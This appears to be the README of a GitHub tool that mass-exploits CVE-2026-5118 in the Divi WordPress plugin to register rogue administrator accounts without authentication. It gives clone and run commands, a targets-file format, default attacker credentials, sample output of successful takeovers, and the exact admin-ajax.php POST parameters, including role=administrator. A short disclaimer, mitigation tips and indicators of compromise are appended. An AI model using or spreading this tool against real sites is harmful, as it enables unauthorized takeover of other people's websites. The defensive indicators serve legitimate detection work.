
CVE-2026-5118 – Python2 mass exploit for Divi WordPress plugin Unauthenticated administrator registration via admin-ajax.php. Multi‑threaded scanner with nonce extraction.
⚠️ WARNING: This tool is for authorized penetration testing and security research only.
Unauthorized access to computer systems is illegal. Use only on systems you own or have explicit written permission to test. More Disclaimer You can see the disclaimer on the cover of Jenderal92. You can check it HERE !!!
This Python 2 script exploits a privilege escalation vulnerability in the Divi WordPress plugin (and related Divi forms). It allows remote registration of an administrator account by:
fb_nonce from the target's Divi registration form./wp-admin/admin-ajax.php with role=administrator.https:// if missing.de_fb_obj).success, user_id, user created, etc.).results.txt in the format:https://target.com/wp-admin/ | username | passwordurllib2, Queue, threading – not compatible with Python 3 without modifications)git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
Create a text file with one domain or URL per line. You can omit http:// / https:// – the script will add https:// by default.
Example targets.txt:
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
python CVE-2026-5118.py targets.txt
[*] Total targets : 4
[*] Credentials : Attacker / Attacker@123#+
[*] Threads : 20
[*] Output file : results.txt
[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/
[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/
[3] Checking http://192.168.1.100/wordpress
[3] FAILED http://192.168.1.100/wordpress
[4] Checking https://test-site.org
[4] FAILED https://test-site.org
=== DONE ===
Successful: 2 / 4
results.txt)https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
You can customise the following variables at the top of the script:
| Variable | Default | Description |
|---|---|---|
DEFAULT_USERNAME | Attacker | Username to register |
DEFAULT_PASSWORD | Attacker@123#+ | Password (strong with special characters) |
DEFAULT_EMAIL | [email protected] | Email address |
THREAD_COUNT | 20 | Number of concurrent threads |
OUTPUT_FILE | results.txt | File to save successful targets |
https:// if no scheme is provided.fb_nonce using regex patterns.multipart/form-data POST containing:
action=de_fb_ajax_submit_ajax_handlerfb_nonce=<extracted nonce>role=administratorde_fb_user_login / user_loginde_fb_user_pass / user_passde_fb_user_email / user_emailFor WordPress administrators using Divi:
admin-ajax.php requests.role parameter that can be manipulated.Indicators of compromise (IOCs):
admin-ajax.php requests with action=de_fb_ajax_submit_ajax_handlerAttacker)role=administrator in access logsThis software is provided for educational purposes and authorised security testing only. The author assumes no liability for misuse or damage caused by this tool. By using this software, you agree to:
Violating these terms may result in criminal prosecution, fines, or imprisonment.
Pull requests are welcome for improvements (Python 3 port, better nonce extraction, additional registration path detection). Please maintain the ethical disclaimer.